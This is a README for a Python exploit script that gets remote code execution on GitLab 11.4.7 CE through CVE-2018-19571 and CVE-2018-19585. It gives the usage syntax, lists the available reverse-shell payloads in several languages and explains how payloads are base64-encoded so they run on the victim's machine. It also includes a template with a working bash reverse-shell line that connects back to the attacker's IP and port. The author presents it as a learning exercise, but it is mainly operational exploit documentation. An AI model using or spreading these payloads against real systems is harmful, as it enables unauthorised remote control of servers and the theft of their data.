GitLab 11.4.7 CE RCE exploit with different reverse shells.
CVE-2018-19571: https://nvd.nist.gov/vuln/detail/CVE-2018-19571
CVE-2018-19585: https://nvd.nist.gov/vuln/detail/CVE-2018-19585
Modification of the version from Sam Redmond and Tam Lai Yin in order to learn and practice.
It is written in python3 as all things should be.
Dependencies:
pip3 install requests
Use:
python3 rce_script.py -u <username> -p <password> -g <url:port> -l <local ip> -P <local port> [<shell lang>]
By default, the netcat with -e option shell is used.
Current build-in shells:
- nc_e
- Netcat with the -e option.
- bash:
- Bash executed with absolute path.
- perl:
- Perl executed from the $PATH.
- python3:
- Python3 executed from the $PATH.
- ruby:
- Ruby executed from the $PATH.
- php:
- PHP executed from the $PATH. Note: Usually doesn't work in the GitLab docker.
Some shells contain characters thats doesn't get along with the request encoding. Therefore they are encoded in Base64 and then decoded and executed in the victim's machine.
If you want to add your own shell, add a value to the payloads_dict structure.
You must define the following:
'bash': {
# If the raw_payload can be executed withoud encoding
'safe': False,
# Payload, must contain the references for the local_ip and for the local_port
'raw_payload': 'bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1',
# How to execute the payload if safe is False. Must conatin the reference for payload
'exec_string': 'echo {payload} | base64 -d | /bin/bash'
}The HTML parsing is pretty hardcoded, it may break easily.